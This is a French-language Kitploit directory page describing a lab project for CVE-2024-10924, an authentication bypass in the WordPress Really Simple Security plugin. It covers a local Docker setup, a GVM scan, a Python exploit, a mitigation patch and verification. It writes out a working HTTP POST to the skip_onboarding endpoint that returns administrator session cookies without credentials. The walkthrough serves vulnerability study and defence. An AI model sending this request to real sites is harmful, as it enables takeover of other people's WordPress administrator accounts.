Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-10924 — Démontre l'exploitation et l'atténuation de CVE-2024-10924, un contournement d'authentification dans WordPress Really Simple Security, avec un exploit Python automatisé, des étapes manuelles avec Burp Suite et la vérification du correctif. | Kitploit
Outils/GitHubGitHub/bodoinon/cve-2024-10924
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationApprentissage et Éducation
GitHubbodoinon/cve-2024-10924

CVE-2024-10924

Démontre l'exploitation et l'atténuation de CVE-2024-10924, un contournement d'authentification dans WordPress Really Simple Security, avec un exploit Python automatisé, des étapes manuelles avec Burp Suite et la vérification du correctif.

Voir le dépôt
2il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-10924 - Contournement de l'authentification dans Really Simple Security

APERÇU Ce projet démontre l'exploitation et l'atténuation de CVE-2024-10924, une vulnérabilité critique de contournement de l'authentification dans le plugin WordPress « Really Simple Security ».

ÉTAPE 1 : CONFIGURATION DE L'ENVIRONNEMENT

Démarrez l'environnement WordPress vulnérable : cd wordpress-really-simple-security-authn-bypass-vulnerable-application docker-compose up -d

Vérifiez que les conteneurs sont en cours d'exécution : docker ps

Accédez à WordPress : http://localhost:1337

Outils requis :

  • Python 3.x (pour l'exploitation automatisée)
  • Burp Suite (pour l'exploitation manuelle)
  • GVM (Greenbone Vulnerability Management) pour l'analyse

ÉTAPE 2 : ANALYSE DE VULNÉRABILITÉ

Lancez une analyse GVM sur la cible :

  • Cible : http://localhost:1337
  • Résultat attendu : CVE-2024-10924 détecté
  • Sévérité : Critique (CVSS 9.8)
  • Point de terminaison vulnérable : /reallysimplessl/v1/two_fa/skip_onboarding

ÉTAPE 3 : EXPLOITATION

Méthode A - Exploitation Python automatisée : python exploit.py

Méthode B - Exploitation manuelle avec Burp Suite :

  1. Interceptez le trafic vers http://localhost:1337

  2. Envoyez la requête POST : POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: localhost:1337 Content-Type: application/json

    {"user_id": 1, "login_nonce": "hack", "redirect_to": "/wp-admin/"}

  3. Observez la réponse avec l'en-tête Set-Cookie contenant la session administrateur

Résultat attendu :

  • Statut : 200 OK
  • Les cookies de session administrateur sont renvoyés
  • Contournement réussi sans identifiants

ÉTAPE 4 : ATTÉNUATION

Appliquez le correctif pour bloquer le point de terminaison vulnérable : .\patch.ps1

Ce que cela fait :

  • Copie mitigation.php dans le dossier /wp-content/mu-plugins/ du conteneur
  • Bloque toutes les requêtes vers le point de terminaison vulnérable de l'API REST
  • Renvoie 403 Forbidden pour les tentatives d'exploitation
  • ÉTAPE 5 : VÉRIFICATION

    Relancez l'exploit (méthode A ou B) : python exploit.py

    Résultat attendu après l'atténuation :

    • Statut : 403 Forbidden
    • Aucun cookie de session administrateur renvoyé
    • Attaque bloquée avec succès

    NOTES SUPPLÉMENTAIRES

    Pour arrêter l'environnement : docker-compose down

    Pour afficher les journaux des conteneurs : docker-compose logs -f

    Pour accéder légitimement à l'administration WordPress : http://localhost:1337/wp-admin (Consultez docker-compose.yml pour les identifiants)

    Télécharger l’outil